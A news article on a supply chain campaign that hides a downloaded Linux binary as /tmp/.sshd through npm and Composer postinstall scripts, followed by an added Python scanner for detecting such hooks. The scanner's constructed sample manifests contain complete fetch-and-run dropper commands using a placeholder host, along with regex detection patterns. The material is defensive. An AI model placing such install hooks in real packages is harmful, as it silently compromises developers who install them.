Hackers Hide Linux Payload Under SSH-Like Filename During Package Installation
https://cybersecuritynews.com/hackers-hide-linux-payload-under-ssh-like-filename/
Publish Date: 2026-05-25 15:10:00
Source Domain: cybersecuritynews.com
A new supply chain attack campaign is quietly targeting developers through a method most would never think to look for.
Hidden inside software packages on GitHub, a malicious script downloads a Linux binary during installation and disguises it using a filename designed to look like a standard system process. The attack has now touched more than 700 repositories across multiple ecosystems.
The campaign works by planting a harmful postinstall script inside PHP and Node.js packages. When a developer installs an affected package, the script runs automatically without any visible warning.
It reaches out to an attacker-controlled GitHub account, pulls down a binary file, and saves it to a temporary folder on the victim's Linux system as /tmp/.sshd. The name imitates sshd, the OpenSSH server daemon, so the running payload blends in with legitimate entries in a process listing; the leading dot also hides the file from a plain directory listing. The genuine daemon is installed by the distribution under a system path such as /usr/sbin/sshd, so an "sshd" executing out of /tmp is itself a strong indicator of compromise.
Researchers at Socket.dev said in a report shared with Cyber Security News (CSN) that they identified this campaign while investigating a set of flagged Packagist packages.
Their AI-powered scanner picked up on the suspicious install-time behavior, flagging packages as malicious based on how they handled binary downloads and background execution. The findings revealed a campaign far broader than the initial batch suggested.
The attack spreads across both Packagist and Node.js project repositories on GitHub. Investigators found that a GitHub account named parikhrpreksha served as the central delivery point for the payload.
The same postinstall command appeared consistently across hundreds of repositories, all pulling the same binary from the same GitHub Releases URL, pointing to a coordinated supply chain operation.
What makes this attack hard to catch is how effectively it hides its activity. The script suppresses error messages that might appear during installation and runs the downloaded binary silently in the background.
Developers reviewing standard install logs would see nothing unusual, and…
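As an added example, not the researchers' scanner or the campaign's own script, the following Python flags npm and Composer install-time hooks that combine the traits described above: a network fetch, a drop into /tmp under a hidden daemon-like name, making the file executable, silenced errors, and background execution. The manifests it scans are constructed samples written from the article's description; the download URL in them is a placeholder, not the real GitHub Releases URL, and the rule set and threshold are this example's own choices.

```python
"""Flag npm / Composer install-time scripts that fetch and silently run a binary.

Added example: heuristics written from the behaviour described in the article,
not Socket's scanner. The manifests below are constructed sample input.
"""
import json
import re
from dataclasses import dataclass, field

# Hooks npm runs unprompted during `npm install`.
NPM_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
# Composer hooks; Composer documents that only the root package's scripts run
# (plugins aside), so for a dependency these matter when the project itself is
# cloned and installed, or when the package is used as a root project.
COMPOSER_HOOKS = {"pre-install-cmd", "post-install-cmd", "post-update-cmd",
                  "post-autoload-dump", "post-package-install"}

# (rule name, regex). One hit alone is normal; several together on one hook is
# the dropper shape: fetch, drop in /tmp, hide, chmod, silence, background.
RULES = [
    ("network_fetch",    re.compile(r"\b(curl|wget)\b")),
    ("tmp_drop",         re.compile(r"/(tmp|dev/shm|var/tmp)/")),
    # Hidden file in a path; node_modules/.bin is excluded as routine npm usage.
    ("hidden_file",      re.compile(r"/\.(?!bin\b)[\w-]+\b")),
    ("daemon_lookalike", re.compile(r"/\.?(sshd|systemd|cron|kworker|dbus)\b")),
    ("make_executable",  re.compile(r"\bchmod\s+(?:[ugoa]*\+x|[0-7]{3,4})\b")),
    ("stderr_silenced",  re.compile(r"2>\s*/dev/null|&>\s*/dev/null|>\s*/dev/null\s+2>&1")),
    # A lone '&' (not '&&' or '>&'), or explicit detach helpers.
    ("background_exec",  re.compile(r"(?<![&>])&(?![&>])|\b(nohup|setsid|disown)\b")),
]


@dataclass
class Finding:
    manifest: str
    hook: str
    command: str
    hits: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.hits)


def _scripts(manifest: dict, kind: str):
    """Yield (hook, command) for every auto-run hook in an npm or Composer manifest."""
    hooks = NPM_HOOKS if kind == "npm" else COMPOSER_HOOKS
    scripts = manifest.get("scripts")
    if not isinstance(scripts, dict):
        return
    for hook, value in scripts.items():
        if hook not in hooks:
            continue
        # Composer allows a list of commands per hook; npm uses a single string.
        for cmd in (value if isinstance(value, list) else [value]):
            if isinstance(cmd, str):
                yield hook, cmd


def scan_manifest(text: str, kind: str, name: str = "<manifest>", threshold: int = 3):
    """Return a Finding for each hook command tripping at least `threshold` rules.

    kind is "npm" (package.json) or "composer" (composer.json).
    """
    manifest = json.loads(text)
    findings = []
    for hook, cmd in _scripts(manifest, kind):
        hits = [rule for rule, rx in RULES if rx.search(cmd)]
        if len(hits) >= threshold:
            findings.append(Finding(name, hook, cmd, hits))
    return findings


# Constructed sample: the shape the article describes. Placeholder URL, not the
# campaign's real release URL.
MALICIOUS_PACKAGE_JSON = json.dumps({
    "name": "example-widget", "version": "1.0.3",
    "scripts": {
        "postinstall": "curl -fsSL https://releases.example.invalid/v1/asset "
                       "-o /tmp/.sshd 2>/dev/null; chmod +x /tmp/.sshd; "
                       "/tmp/.sshd >/dev/null 2>&1 &",
        "test": "node test.js",
    },
})

# Constructed benign sample: a postinstall that only builds local sources.
BENIGN_PACKAGE_JSON = json.dumps({
    "name": "example-native", "version": "2.1.0",
    "scripts": {"postinstall": "node-gyp rebuild", "test": "mocha"},
})

# Constructed Composer sample with the same behaviour split over two commands.
MALICIOUS_COMPOSER_JSON = json.dumps({
    "name": "example/widget",
    "scripts": {"post-install-cmd": [
        "wget -q https://releases.example.invalid/v1/asset -O /tmp/.sshd 2>/dev/null",
        "chmod 755 /tmp/.sshd && nohup /tmp/.sshd >/dev/null 2>&1 &",
    ]},
})

if __name__ == "__main__":
    for label, text, kind in [("package.json", MALICIOUS_PACKAGE_JSON, "npm"),
                              ("benign package.json", BENIGN_PACKAGE_JSON, "npm"),
                              ("composer.json", MALICIOUS_COMPOSER_JSON, "composer")]:
        for f in scan_manifest(text, kind, label):
            print(f"{f.manifest} [{f.hook}] score={f.score} hits={f.hits}\n    {f.command}")
```

Run it over every package.json and composer.json under node_modules or vendor before (or instead of) letting lifecycle scripts execute; `npm install --ignore-scripts` gives you the chance to review hooks first. The threshold of three keeps single incidental matches, such as a `chmod` in a native build step, from firing; a download into /tmp combined with error suppression and a trailing `&` is what the campaign's hook looks like and what this is meant to catch.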